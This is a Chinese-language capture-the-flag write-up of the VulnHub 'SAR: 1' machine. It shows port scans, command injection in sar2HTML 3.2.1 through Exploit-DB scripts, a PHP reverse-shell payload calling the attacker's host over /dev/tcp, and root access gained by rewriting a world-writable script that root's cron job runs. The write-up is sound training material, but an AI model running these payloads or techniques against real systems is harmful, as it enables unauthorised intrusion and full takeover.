SAR: 1
https://www.vulnhub.com/entry/sar-1,425/
nmap 扫描
ip:192.168.54.13
# Nmap 7.93 scan initiated Tue May 16 09:18:11 2023 as: nmap --min-rate 20000 -p- -oN nmap/port 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:18:14 2023 -- 1 IP address (1 host up) scanned in 3.10 seconds
# Nmap 7.93 scan initiated Tue May 16 09:18:32 2023 as: nmap -sT --min-rate 20000 -p- -oN nmap/tcp 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.0014s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:18:35 2023 -- 1 IP address (1 host up) scanned in 3.12 seconds
# Nmap 7.93 scan initiated Tue May 16 09:18:45 2023 as: nmap -sU --min-rate 20000 -p- -oN nmap/udp 192.168.54.13
Warning: 192.168.54.13 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.54.13
Host is up (0.00048s latency).
All 65535 scanned ports on 192.168.54.13 are in ignored states.
Not shown: 65493 open|filtered udp ports (no-response), 42 closed udp ports (port-unreach)
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:19:22 2023 -- 1 IP address (1 host up) scanned in 37.06 seconds
# Nmap 7.93 scan initiated Tue May 16 09:18:52 2023 as: nmap -sV -p80 -oN nmap/services 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:90:14:1A (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 16 09:19:00 2023 -- 1 IP address (1 host up) scanned in 7.74 seconds
# Nmap 7.93 scan initiated Tue May 16 09:19:07 2023 as: nmap -sC -p80 -oN nmap/script 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00025s latency).
PORT STATE SERVICE
80/tcp open http
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:19:13 2023 -- 1 IP address (1 host up) scanned in 5.92 seconds
# Nmap 7.93 scan initiated Tue May 16 09:19:39 2023 as: nmap --script=vuln -p80 -oN nmap/vuln 192.168.54.13
Nmap scan report for 192.168.54.13
Host is up (0.00030s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /robots.txt: Robots file
|_ /phpinfo.php: Possible information file
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:90:14:1A (VMware)
# Nmap done at Tue May 16 09:20:11 2023 -- 1 IP address (1 host up) scanned in 32.31 seconds
80端口web渗透
发现了robots.txt,打开发现sar2HTML,打开http://192.168.54.13/sar2HTML,发现是个工具,且告诉了版本号sar2html Ver 3.2.1
,既然是工具就可能存在漏洞,去searchsploit搜一下。
# yunki @ yunki in ~/vulnhub/sar [9:25:41] C:130
$ searchsploit sar2html
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution | php/webapps/47204.txt
----------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
发现了2个且版本都是对应的,试试。
# yunki @ yunki in ~/vulnhub/sar [9:31:26]
$ searchsploit -m 49344
Exploit: sar2html 3.2.1 - 'plot' Remote Code Execution
URL: https://www.exploit-db.com/exploits/49344
Path: /usr/share/exploitdb/exploits/php/webapps/49344.py
Codes: N/A
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/yunki/vulnhub/sar/49344.py
# yunki @ yunki in ~/vulnhub/sar [9:31:35]
$ searchsploit -m 47204
Exploit: Sar2HTML 3.2.1 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/47204
Path: /usr/share/exploitdb/exploits/php/webapps/47204.txt
Codes: N/A
Verified: False
File Type: ASCII text
Copied to: /home/yunki/vulnhub/sar/47204.txt
先试试第一个。
# yunki @ yunki in ~/vulnhub/sar [9:31:41]
$ cat 47204.txt
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.%
发现执行成功了,那就说明该漏洞是存在的。用下一个py脚本试试。
# yunki @ yunki in ~/vulnhub/sar [9:31:46]
$ python3 49344.py
Enter The url => http://192.168.54.13/sar2HTML/
Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE
Command =>
发现该脚本相当于一个shell。但是不够好用,那我们写一个反弹shell试试。
kali
# yunki @ yunki in ~/vulnhub/sar [9:41:16]
$ vim shell.txt
# yunki @ yunki in ~/vulnhub/sar [9:42:02]
$ cat shell.txt
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>
# yunki @ yunki in ~/vulnhub/sar [9:42:08]
$ php -S 0:80
[Tue May 16 09:42:11 2023] PHP 7.4.15 Development Server (http://0:80) started
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 Accepted
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 [200]: (null) /shell.txt
[Tue May 16 09:42:37 2023] 192.168.54.13:44450 Closing
靶机
Command => wget http://192.168.54.128/shell.txt -O shell.php
Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILE
shell.php
开启端口监听,然后打开http://192.168.54.13/shell.php
发现已经反弹shell了。
获得系统立足点
# yunki @ yunki in ~/vulnhub/sar [9:46:21] C:1
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.13] 37552
bash: cannot set terminal process group (843): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$
提权
www-data@sar:/var/www/html/sar2HTML$ ls -liah
ls -liah
total 164K
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 .
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21 2019 ..
405911 -rwxr-xr-x 1 www-data www-data 35K Mar 14 2019 LICENSE
405981 -rwxr-xr-x 1 www-data www-data 53K Mar 19 2019 index.php
405908 -rwxr-xr-x 1 www-data www-data 52K Mar 19 2019 sar2html
426148 drwxr-xr-x 3 www-data www-data 4.0K Oct 20 2019 sarDATA
405912 drwxr-xr-x 3 www-data www-data 4.0K Mar 19 2019 sarFILE
401045 -rw-r--r-- 1 www-data www-data 76 May 16 07:12 shell.php
www-data@sar:/var/www/html/sar2HTML$ cd ..
cd ..
www-data@sar:/var/www/html$ ls
ls
finally.sh
index.html
phpinfo.php
robots.txt
sar2HTML
write.sh
www-data@sar:/var/www/html$ ls -liah
ls -liah
total 40K
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21 2019 .
406325 drwxr-xr-x 4 www-data www-data 4.0K Oct 21 2019 ..
408197 -rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
405623 -rw-r--r-- 1 www-data www-data 11K Oct 20 2019 index.html
408195 -rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
400981 -rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 sar2HTML
408199 -rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.sh
www-data@sar:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
发现有个root权限执行的定时任务,且5分钟执行一次。
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh
./write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/sh
touch /tmp/gateway
www-data@sar:/var/www/html$ ls -liah
ls -liah
total 40K
406326 drwxr-xr-x 3 www-data www-data 4.0K Oct 21 2019 .
406325 drwxr-xr-x 4 www-data www-data 4.0K Oct 21 2019 ..
408197 -rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
405623 -rw-r--r-- 1 www-data www-data 11K Oct 20 2019 index.html
408195 -rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
400981 -rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
405734 drwxr-xr-x 4 www-data www-data 4.0K May 16 07:12 sar2HTML
408199 -rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.sh
可以root权限执行write.sh,但可以修改write.sh,那就修改为反弹shell。
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.54.128/4444 0>&1
然后静静地等待5分钟,就获取了root权限的反弹shell。
结束
root@sar:/var/www/html# whoami
whoami
root
root@sar:/var/www/html# cd /root
cd /root
root@sar:~# ls
ls
root.txt
snap
root@sar:~# cat root.txt
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
root@sar:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:90:14:1a brd ff:ff:ff:ff:ff:ff
inet 192.168.54.13/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
valid_lft 293sec preferred_lft 293sec
inet6 fe80::c3cf:34f9:1c23:4932/64 scope link noprefixroute
valid_lft forever preferred_lft forever
root@sar:~# uname -a
uname -a
Linux sar 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux